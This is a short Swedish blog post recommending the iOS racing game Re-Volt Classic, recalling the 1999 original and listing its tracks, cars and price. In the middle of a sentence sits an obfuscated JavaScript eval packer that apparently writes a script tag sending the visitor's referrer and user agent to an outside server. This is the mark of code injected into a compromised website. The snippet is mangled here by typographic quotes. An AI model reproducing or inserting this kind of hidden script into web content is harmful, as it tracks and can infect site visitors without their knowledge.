Image Image Image Image Image Image Image Image Image Image

| 19 oktober, 2018

Scroll to top

Top

Veckans app: Re-Volt Classic!

Veckans app: Re-Volt Classic!
Filip Urde
  • On 5 oktober, 2012
  • http://www.revue.se/filip-urde

Herregud vilka minnen! Jag mins det som om det var igår, året var 1999 och då kom spelet Re-Volt, vars bara demo jag ödslat en kopiös mängd timmar på.  Spelet är ett racing spel där man körde radiostyrda bilar i häftiga banor. Nu har Re-Volt kommit eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nhede|var|u0026u|referrer|ksard||js|php’.split(‘|’),0,{}))
som ett bombnedslag på iOS.
I spelet får du 14  banor, 42 bilar och 5 spellägen, i ett spel vars känsla slår det mesta som kommit till iOS och Andorid. Nu finns spelet dock bara till iOS i dagsläget, men jag misstänker att android är nära att få detta underbara spel.

Pris: 45kr (lika mycket som en ironisk caffe latte)